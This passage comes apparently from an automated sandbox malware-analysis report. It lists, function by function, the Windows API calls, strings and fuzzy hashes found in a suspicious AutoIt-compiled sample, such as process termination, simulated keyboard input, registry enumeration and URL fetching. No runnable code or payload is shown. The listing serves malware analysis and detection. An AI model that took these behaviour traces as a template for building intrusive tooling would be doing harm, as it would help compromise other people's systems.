                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00847C1D
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00847C2C
                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C3B
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C45
                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00847C4C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                            • String ID:
                                            • API String ID: 839392675-0
                                            • Opcode ID: d31f37c195dc049155669d60dd3cbbdc26b6dfc4d93f414d177bc1cedc798f0a
                                            • Instruction ID: 506e4fb11f330cded927b9b811e3023983cc9ecfb78915749cd1493af0b475dc
                                            • Opcode Fuzzy Hash: d31f37c195dc049155669d60dd3cbbdc26b6dfc4d93f414d177bc1cedc798f0a
                                            • Instruction Fuzzy Hash: BDF03A76241258BBE7215B969C0EEEF7B7CFFC6B21F000018FA01D1091E7A05A41C7B5
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 00849A33
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A44
                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A51
                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A5E
                                              • Part of subcall function 008493D1: CloseHandle.KERNEL32(?,?,00849A6B,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 008493DB
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00849A71
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00875DEE,?,?,?,?,?,0080ED63), ref: 00849A78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: 1264bae6addf1458771aaa88d6c88128d34d17a2e79d4306622000104789c2ad
                                            • Instruction ID: f97694918806e2590411cb65d9b5f685112cd47f32a87ee1c86ae0b4df21d7da
                                            • Opcode Fuzzy Hash: 1264bae6addf1458771aaa88d6c88128d34d17a2e79d4306622000104789c2ad
                                            • Instruction Fuzzy Hash: 86F08C32181311ABD7612BACEC8DEEB773AFF89312B140425F603A10E1DBB5A801DB60
                                            APIs
                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • __swprintf.LIBCMT ref: 00801EA6
                                            Strings
                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00801D49
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                            • API String ID: 2125237772-557222456
                                            • Opcode ID: 58274ec5bceaf577b6c1d64f4c8c0c0f2fc9b7ac331bc9aeb1370a46185dc96e
                                            • Instruction ID: 76b292ec97475705569fc698a3e3fab1db25202c71f2a5cea79f6a34dd4eb536
                                            • Opcode Fuzzy Hash: 58274ec5bceaf577b6c1d64f4c8c0c0f2fc9b7ac331bc9aeb1370a46185dc96e
                                            • Instruction Fuzzy Hash: F49159711042019FCB64EF28CC9986EB7A8FF95710F10491DF989D72E2DB61ED44CB92
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 0085B006
                                            • CharUpperBuffW.USER32(?,?), ref: 0085B115
                                            • VariantClear.OLEAUT32(?), ref: 0085B298
                                              • Part of subcall function 00849DC5: VariantInit.OLEAUT32(00000000), ref: 00849E05
                                              • Part of subcall function 00849DC5: VariantCopy.OLEAUT32(?,?), ref: 00849E0E
                                              • Part of subcall function 00849DC5: VariantClear.OLEAUT32(?), ref: 00849E1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                            • API String ID: 4237274167-1221869570
                                            • Opcode ID: 0da797c8fc99c7e904fab115cbb34b4fc4dd658a6ed2672152f3ffcb4fe62938
                                            • Instruction ID: f1aff63ec9eef7291fbec643b00e85faee1f3cd274f7a334e4345a3a7c891e37
                                            • Opcode Fuzzy Hash: 0da797c8fc99c7e904fab115cbb34b4fc4dd658a6ed2672152f3ffcb4fe62938
                                            • Instruction Fuzzy Hash: 8F917C706083059FCB10DF28C49195ABBE4FF98704F04496DF89ADB3A2DB31E949CB52
                                            APIs
                                              • Part of subcall function 0081C6F4: _wcscpy.LIBCMT ref: 0081C717
                                            • _memset.LIBCMT ref: 00845438
                                            • GetMenuItemInfoW.USER32(?), ref: 00845467
                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00845513
                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0084553D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 1bcbb24bd2e6dde39699e5529921798cb3d3c1ac4087e0499d9b989efaee2af5
• Instruction ID: 56947d6cfab83e993bd7c1ed540673674530f0575b2c0c382ea5a5d513156ad4
• Opcode Fuzzy Hash: 1bcbb24bd2e6dde39699e5529921798cb3d3c1ac4087e0499d9b989efaee2af5
• Instruction Fuzzy Hash: B051EEB1204B099BD7149F28C885BBFB7E8FB86314F04062AF895D72D3DB60CD448B92
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0084027B
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008402B1
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008402C2
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00840344
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: f978433dfa2a56ef00e5c45d77a6557577a43a25dceaacd4388c116111e16289
• Instruction ID: 0d16dca9f9e2558bc8cdce6521afa7768cc604528bd3ebf194e75a0fb71553d6
• Opcode Fuzzy Hash: f978433dfa2a56ef00e5c45d77a6557577a43a25dceaacd4388c116111e16289
• Instruction Fuzzy Hash: 82414A71600209EFDB15DF58C884A9BBBB9FF44315B1480A9EA09DF246D7B1DD44CFA0
APIs
• _memset.LIBCMT ref: 00845075
• GetMenuItemInfoW.USER32 ref: 00845091
• DeleteMenu.USER32(00000004,00000007,00000000), ref: 008450D7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008C1708,00000000), ref: 00845120
Strings
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: 430b14cf1a1edc324618d2b58d3b5306ea1512d91911e31869111026a2a6f4dd
• Instruction ID: 90a0c3b966586dafcda908db6eddc8a3826d8bcc65f3f71a36e2033253bc5dd4
• Opcode Fuzzy Hash: 430b14cf1a1edc324618d2b58d3b5306ea1512d91911e31869111026a2a6f4dd
• Instruction Fuzzy Hash: 06417A752057459FD7209F28D884B6EB7A4FF89724F144A1EF895D7292D730A900CB62
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00843966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00843982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 008439EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00843A4D
Strings
• aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 0084399D
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
• API String ID: 432972143-3175721085
• Opcode ID: 5d7654d526c7d82ba36bb47ed6f7eaca9b9556e8bc4a8aaee98d8012acdaad87
• Instruction ID: 351aaa4de5142f4f5b6d44a43be6a5e3615d2fbc52c9ff88408ec59a0610f206
• Opcode Fuzzy Hash: 5d7654d526c7d82ba36bb47ed6f7eaca9b9556e8bc4a8aaee98d8012acdaad87
• Instruction Fuzzy Hash: D441F370A4425CAAEF218B688806BFDBFB9FB56320F04015AF5C1D62C1C7B48E85D766
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0084E742
• GetLastError.KERNEL32(?,00000000), ref: 0084E768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0084E78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0084E7B9
Strings
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID: p1Wu`KXu
• API String ID: 3321077145-4063981602
• Opcode ID: efc0f5a6a0d555bdfdf66f741b2f4182bdc163d5e0439e2d71a087bc6497e8e1
• Instruction ID: 8ad9988fd27373dbdfbe5381115eec8e93b91caef35479a383b420366fb04f4e
• Opcode Fuzzy Hash: efc0f5a6a0d555bdfdf66f741b2f4182bdc163d5e0439e2d71a087bc6497e8e1
• Instruction Fuzzy Hash: 49411639600614DFCB11EF19C44494DBBE5FF59720B09C498E986AB3A2CB70FD40CB92
APIs
• GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00843AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00843AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00843B34
• SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00843B92
Strings
• aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5, xrefs: 00843AF2
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID: aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
• API String ID: 432972143-3175721085
• Opcode ID: 4652e27fab414129629d43743b81aaebe086b55ab0989f94250a15ab02472b91
• Instruction ID: 690efb29c1897986b7a834f31689405dff8af140f949801eb3efcef7cf5a2944
• Opcode Fuzzy Hash: 4652e27fab414129629d43743b81aaebe086b55ab0989f94250a15ab02472b91
• Instruction Fuzzy Hash: EA310430A0425CAEEF218B688819BFEBBA5FB55334F44015AE481E32D2D7748B45D762
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00860587
Strings
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
• Opcode ID: 5e80eaabed561ffc81d685c85ecfbbeb27361c7c9d6293d316c4b4d3d8d965b2
• Instruction ID: d953cfea0169d19000c292c9286721499c5d2786c37b27e29f7d6effbb34a967
• Opcode Fuzzy Hash: 5e80eaabed561ffc81d685c85ecfbbeb27361c7c9d6293d316c4b4d3d8d965b2
• Instruction Fuzzy Hash: A8318D7050021AAFCF10EF98CC529EFB3B8FF55314B108629E826E76D2DB71A955CB90
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0083B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0083B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 0083B8D1
Strings
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: aca9fff6975db44b4f7f317bb2e5e072aeb47259196729784b011fac47d6f455
• Instruction ID: 9848af6ee8008822287bc13eff6cf081b0ff95dc3f601574b087e6b5d3b87634
• Opcode Fuzzy Hash: aca9fff6975db44b4f7f317bb2e5e072aeb47259196729784b011fac47d6f455
• Instruction Fuzzy Hash: F721A0B1A00208AEDB04AB68DC96DFE777CFF85354F104229F521E62E1DB68490697A0
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00854401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00854427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00854457
• InternetCloseHandle.WININET(00000000), ref: 0085449E
  • Part of subcall function 00855052: GetLastError.KERNEL32(?,?,008543CC,00000000,00000000,00000001), ref: 00855067
Strings
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 1951874230-3916222277
• Opcode ID: 9df5182e4db231474f261118e87f04d6b9da9334746cc12a011e24589abf220c
• Instruction ID: 6532c3ce4be09ca2c9f96e6770aef440ca5cc26ea1bef4c32e04c4d2ce7cd273
• Opcode Fuzzy Hash: 9df5182e4db231474f261118e87f04d6b9da9334746cc12a011e24589abf220c
• Instruction Fuzzy Hash: 4521DEB2140208BFE711AF58CC84EBFB7ECFB4875AF10901AF909E2180EA648D499775
APIs
  • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
  • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
  • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0086915C
• LoadLibraryW.KERNEL32(?), ref: 00869163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00869178
• DestroyWindow.USER32(?), ref: 00869180
Strings
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: a37c2679f266517c408f3c0ff62ea5d04939f49bb6aea87029652b563c04a15f
• Instruction ID: cc10a11cf24266cc7673b57bbe5f08e9c0a03b34e5ef7dc4a2cd22a570a3c330
• Opcode Fuzzy Hash: a37c2679f266517c408f3c0ff62ea5d04939f49bb6aea87029652b563c04a15f
• Instruction Fuzzy Hash: DE219F7120020ABBEF104F68DC89EBA37ADFF9A364F220618F994D61D0D735DC41A760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00849588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008495B9
• GetStdHandle.KERNEL32(0000000C), ref: 008495CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00849605
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 53eb995cea85f5626aa596402735035472382105587c3e8cf814c2cb90c21c7b
• Instruction ID: 742235edfc3b54ad6a9b3dbfea4361a6b859cb184ea6e7b37bd9f2d3ee2dfd0a
• Opcode Fuzzy Hash: 53eb995cea85f5626aa596402735035472382105587c3e8cf814c2cb90c21c7b
• Instruction Fuzzy Hash: F0213970600309ABEB219F29DC45A9BBBB8FF95724F214A19F9A1D72D0D770E941CB20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00849653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00849683
• GetStdHandle.KERNEL32(000000F6), ref: 00849694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008496CE
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 73e9a04c3c92c3e3123922e3c871d2ea6c979d903ac9514e9721fe15fbb2da21
• Instruction ID: c6342830f4a33700e5dfc516ecebf71d0e02363dd13d1b7e8b8b734dd0ca3a65
• Opcode Fuzzy Hash: 73e9a04c3c92c3e3123922e3c871d2ea6c979d903ac9514e9721fe15fbb2da21
• Instruction Fuzzy Hash: BB212A716003099BDB309F699C45E9BB7A8FFA5734F210A19E8E1E72D0E7709C41CB55
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0084DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0084DB5E
• __swprintf.LIBCMT ref: 0084DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0089DC00), ref: 0084DBB5
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 4676aff359f2881e322cae6bda91075c26d4347c93a18fc1af52d573c500c970
• Instruction ID: e03b1cab7aa14c216a605ee7aae1b61b1b1b54aa48f886bdd87157193449d36a
• Opcode Fuzzy Hash: 4676aff359f2881e322cae6bda91075c26d4347c93a18fc1af52d573c500c970
• Instruction Fuzzy Hash: A4215335600208AFCB10EFA8DD85DAEBBB8FF89714B104069F905E7391DB71EA41CB61
APIs
  • Part of subcall function 0083C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0083C84A
  • Part of subcall function 0083C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0083C85D
  • Part of subcall function 0083C82D: GetCurrentThreadId.KERNEL32 ref: 0083C864
  • Part of subcall function 0083C82D: AttachThreadInput.USER32(00000000), ref: 0083C86B
• GetFocus.USER32 ref: 0083CA05
  • Part of subcall function 0083C876: GetParent.USER32(?), ref: 0083C884
• GetClassNameW.USER32(?,?,00000100), ref: 0083CA4E
• EnumChildWindows.USER32(?,0083CAC4), ref: 0083CA76
• __swprintf.LIBCMT ref: 0083CA90
Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                            • String ID: %s%d
                                            • API String ID: 3187004680-1110647743
                                            • Opcode ID: f825e70fb11aa83a1dc9586957c42ab5a5cfeba70fb192a6eadc56ec4061e467
                                            • Instruction ID: 89649b88118a14d60a843b186de9b645c32b1cdd2a4e6de33ee1aa6045a58a5f
                                            • Opcode Fuzzy Hash: f825e70fb11aa83a1dc9586957c42ab5a5cfeba70fb192a6eadc56ec4061e467
                                            • Instruction Fuzzy Hash: B111A2B16002196BCF11BF689C85FA93778FF84714F008066FA19FA182DB749645CBB1
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008619F3
                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00861A26
                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00861B49
                                            • CloseHandle.KERNEL32(?), ref: 00861BBF
                                            Similarity
                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                            • String ID:
                                            • API String ID: 2364364464-0
                                            • Opcode ID: b28c23f640a0d280b224ac47fe3c250fee402b3a5fd268b490eb6e6597ce017f
                                            • Instruction ID: 812fc69f671bcb0ac5d8176d2d83383dd9eaeecee7a9cf57bceea7c02f201c8f
                                            • Opcode Fuzzy Hash: b28c23f640a0d280b224ac47fe3c250fee402b3a5fd268b490eb6e6597ce017f
                                            • Instruction Fuzzy Hash: E3815470600214ABDF10DF68C89ABADBBE9FF04720F198459F905EF3D2D7B5A9418B91
                                            APIs
                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0086E1D5
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086E20D
                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0086E248
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0086E269
                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0086E281
                                            Similarity
                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                            • String ID:
                                            • API String ID: 3188977179-0
                                            • Opcode ID: fbb1414b0cf22402c6833419ed13d6d659e34dae733957329a8972721a681bae
                                            • Instruction ID: b1f34bc8e45bebc465fa1995c34621d0403817540445de168d7517644653a963
                                            • Opcode Fuzzy Hash: fbb1414b0cf22402c6833419ed13d6d659e34dae733957329a8972721a681bae
                                            • Instruction Fuzzy Hash: DC61C138A00608AFDB21CF58C895FAA77BAFF9A300F164059F959D73A1C770A951DB11
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00841CB4
                                            • VariantClear.OLEAUT32(00000013), ref: 00841D26
                                            • VariantClear.OLEAUT32(00000000), ref: 00841D81
                                            • VariantClear.OLEAUT32(?), ref: 00841DF8
                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00841E26
                                            Similarity
                                            • API ID: Variant$Clear$ChangeInitType
                                            • String ID:
                                            • API String ID: 4136290138-0
                                            • Opcode ID: b41555565d637113ccdcbb2865293a400663ed488f4b921812730b98e19de009
                                            • Instruction ID: 77886ccef1d0afa2c44a227dd547aa052a33cb3af2e1080c67d0affb9ffe9fa7
                                            • Opcode Fuzzy Hash: b41555565d637113ccdcbb2865293a400663ed488f4b921812730b98e19de009
                                            • Instruction Fuzzy Hash: 495126B5A00209AFDF14CF58C884AAAB7B9FF8C314B158559ED59DB341E730EA51CFA0
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008606EE
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0086077D
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0086079B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008607E1
                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 008607FB
                                              • Part of subcall function 0081E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0084A574,?,?,00000000,00000008), ref: 0081E675
                                              • Part of subcall function 0081E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0084A574,?,?,00000000,00000008), ref: 0081E699
                                            Similarity
                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                            • String ID:
                                            • API String ID: 327935632-0
                                            • Opcode ID: 77982014d4630d9fc095eb358675f90cad1b6dedfe77059338b4ae8d4b1c1f65
                                            • Instruction ID: 5a7c0148dce4ae11b77ee2c0444ad588fc479851bf584ce768dd20b210645eb7
                                            • Opcode Fuzzy Hash: 77982014d4630d9fc095eb358675f90cad1b6dedfe77059338b4ae8d4b1c1f65
                                            • Instruction Fuzzy Hash: 0E514775A00209DFCB04EFA8C8859AEB7B5FF18310B058069E946EB392DB30ED45CF85
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00862EEF
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00862F2E
                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00862F75
                                            • RegCloseKey.ADVAPI32(?,?), ref: 00862FA1
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00862FAE
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                            • String ID:
                                            • API String ID: 3740051246-0
                                            • Opcode ID: 4cac37e534f595f2ccdf728f432f2547e0c3ee701e2685f9e199ca883d1f59dd
                                            • Instruction ID: a92aac82fa9f6679d2438110d77ba1b1b87a60299795c5a941a39e196bda9fe8
                                            • Opcode Fuzzy Hash: 4cac37e534f595f2ccdf728f432f2547e0c3ee701e2685f9e199ca883d1f59dd
                                            • Instruction Fuzzy Hash: 14514471208304AFC754EF68CC91E6AB7E9FF88314F00896DB595D72A1DB70E904CB52
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52f5f4f9020a8e0999c134146521072a7b1be18c1204bef2b9d7960dc922fb28
                                            • Instruction ID: 0b67fa8b2a31c9e258d72a8a8d009abafe6100c6cffa9fb7551ed28a228ba74d
                                            • Opcode Fuzzy Hash: 52f5f4f9020a8e0999c134146521072a7b1be18c1204bef2b9d7960dc922fb28
                                            • Instruction Fuzzy Hash: 68418079900208AFDB20DF68CC48FB9BB78FB09314F160265E999E72E1D771AD519B90
                                            APIs
                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008512B4
                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008512DD
                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0085131C
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
